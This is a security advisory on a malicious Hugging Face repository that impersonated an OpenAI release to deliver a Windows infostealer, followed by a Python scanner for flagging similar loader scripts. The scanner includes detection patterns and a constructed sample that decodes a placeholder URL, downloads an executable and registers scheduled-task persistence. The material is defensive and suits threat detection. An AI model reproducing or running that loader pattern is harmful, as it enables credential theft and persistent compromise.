Technical description
A malicious Hugging Face model repository named 'Open-OSS/privacy-filter' impersonated OpenAI's legitimate Privacy Filter release. The repository achieved #1 trending position on Hugging Face with approximately 244,000 downloads and 667 likes in under 18 hours (likely artificially inflated). The repository included a malicious loader.py file that fetched and executed a Rust-based infostealer targeting Windows hosts, Chromium/Firefox browsers, Discord local storage, cryptocurrency wallets, FileZilla configs, and host system information. The attack chain disabled SSL verification, decoded base64-encoded C2 URLs via jsonkeeper.com, and established persistence via scheduled tasks mimicking Microsoft Edge updates.
Attack vector
Supply chain compromise via a public AI model registry. Attackers copy the legitimate project's metadata, disguise the malicious loader as a normal setup script, and abuse Hugging Face's early trust period before the repository is removed. Developers and data scientists cloning models directly into corporate environments with elevated access provide the initial infection vector.
Affected systems
Any organization cloning models directly from Hugging Face into development, data science, or production environments without code review. Particularly high-risk: enterprises allowing developers to execute arbitrary Python scripts during model setup. Six additional malicious repositories using identical loader logic and shared infrastructure were identified, suggesting a coordinated campaign.
Mitigation
Immediate:
(1) audit Hugging Face clones in your environment for suspicious loader.py or similar setup scripts;
(2) review execution and network logs for communications with jsonkeeper.com or other attacker-controlled domains;
(3) isolate and rebuild affected systems;
(4) rotate all credentials potentially exposed (browser passwords, Discord tokens, cryptocurrency wallets, cloud credentials).
Longer-term:
(1) require code review before executing any model setup scripts;
(2) isolate model-loading environments from the corporate network;
(3) use container scanning and binary analysis before model deployment;
(4) monitor Hugging Face for typosquatting and impersonation of your organization's releases;
(5) implement software supply chain controls (SBOM, signed artifacts, provenance verification) for AI models equivalent to those used for traditional software.
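A starting point for the audit step above, written here as an added example and not taken from the advisory or from Hugging Face: it walks a directory of cloned model repositories (the path is an assumption you supply) and flags Python scripts whose behaviour matches the described loader. The two sample scripts are constructed for the demonstration; the placeholder URL in the first is not the real C2 address.

```python
"""Triage of setup scripts in cloned model repositories (added example).
Flags behaviours matching the loader described above; heuristic only: a hit
means "read this file before running it", not proof of compromise."""
import re
from pathlib import Path

STAGING_DOMAINS = ("jsonkeeper.com",)  # named in the advisory; extend locally

# Rule name -> patterns that must ALL match somewhere in the file.
RULES = {
    "tls_verification_disabled": [r"verify\s*=\s*False|_create_unverified_context|CERT_NONE"],
    "decoded_c2_url": [r"b64decode\s*\(", r"urlopen\s*\(|requests\.(get|post)\s*\(|urlretrieve\s*\("],
    "dynamic_execution": [r"\bexec\s*\(|\beval\s*\(|subprocess\.(Popen|run|call|check_output)\s*\(|os\.(system|popen|startfile)\s*\("],
    "scheduled_task_persistence": [r"schtasks\b.*?/create|Register-ScheduledTask"],
    "known_staging_domain": ["|".join(re.escape(d) for d in STAGING_DOMAINS)],
}

def triage_source(source: str) -> list[str]:
    """Return the names of every rule whose patterns all match `source`."""
    return [name for name, patterns in RULES.items()
            if all(re.search(p, source, re.I | re.S) for p in patterns)]

def is_suspicious(hits: list[str]) -> bool:
    """Escalate on the staging domain alone or on two or more behaviours; a lone subprocess call is too common in benign code."""
    return "known_staging_domain" in hits or len(hits) >= 2

def triage_tree(root: Path) -> dict[str, list[str]]:
    """Walk cloned model directories (path is your assumption) and return {file: hits} for scripts a human should read."""
    findings = {}
    for path in root.rglob("*.py"):
        hits = triage_source(path.read_text(errors="replace"))
        if is_suspicious(hits):
            findings[str(path)] = hits
    return findings

# Constructed samples so the block runs offline; the first mirrors the advisory's
# behaviours with a placeholder URL and is NOT the real loader.
SUSPICIOUS_SAMPLE = '''
import base64, ssl, subprocess, urllib.request
ssl._create_default_https_context = ssl._create_unverified_context
url = base64.b64decode("aHR0cHM6Ly9leGFtcGxlLmludmFsaWQvcGF5bG9hZA==").decode()
open("update.exe", "wb").write(urllib.request.urlopen(url).read())
subprocess.run(["schtasks", "/create", "/tn", "MicrosoftEdgeUpdate", "/tr", "update.exe"])
'''
BENIGN_SAMPLE = '''
from transformers import AutoModel
model = AutoModel.from_pretrained(".")
'''
```

Run `triage_tree(Path("~/.cache/huggingface/hub").expanduser())` or point it at wherever your team clones models; treat every returned file as a blocker for code review, not as a verdict.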